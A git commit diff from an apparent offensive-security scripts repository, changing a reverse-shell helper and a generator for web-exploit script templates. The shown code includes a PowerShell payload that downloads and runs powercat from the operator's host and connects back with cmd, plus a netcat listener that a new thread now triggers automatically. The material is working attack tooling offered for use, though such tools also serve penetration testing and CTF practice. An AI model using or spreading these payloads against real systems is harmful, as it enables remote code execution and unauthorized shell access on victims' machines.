This commit is contained in:
Roman Hergenreder 2021-06-11 12:44:35 +02:00
parent 29d5f63c58
commit 1891efe2e4
2 changed files with 16 additions and 7 deletions

@ -4,6 +4,8 @@ import socket
import sys import sys
import pty import pty
import util import util
import time
import threading
def generatePayload(type, local_address, port): def generatePayload(type, local_address, port):
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port) return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
def triggerShell(func, port): def triggerShell(func, port):
def _wait_and_exec():
time.sleep(1.5)
func() func()
threading.Thread(target=_wait_and_exec).start()
pty.spawn(["nc", "-lvvp", str(port)]) pty.spawn(["nc", "-lvvp", str(port)])

@ -5,21 +5,23 @@ import sys
def generateTemplate(baseUrl): def generateTemplate(baseUrl):
template = """#!/usr/bin/env python template = """#!/usr/bin/env python
import requests import sys
import base64
import json import json
import base64
import requests
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from hackingscripts import util, fileserver from hackingscripts import util, fileserver
from urllib3.exceptions import InsecureRequestWarning from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s" BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
def login(username, password): def login(username, password):
# Template method to create a session # Template method to create a session
session = requests.Session() session = requests.Session()
post_data = { "username": username, "password": password } post_data = { "username": username, "password": password }
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False) res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home": if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
print("Login failed") print("Login failed")
exit() exit()
@ -29,8 +31,9 @@ def exploit(session, payload):
# Template method to exploit an endpoint # Template method to exploit an endpoint
pass pass
session = login() if __name__ == "__main__":
exploit(session, "id") session = login()
exploit(session, "id")
""" % baseUrl """ % baseUrl
return template return template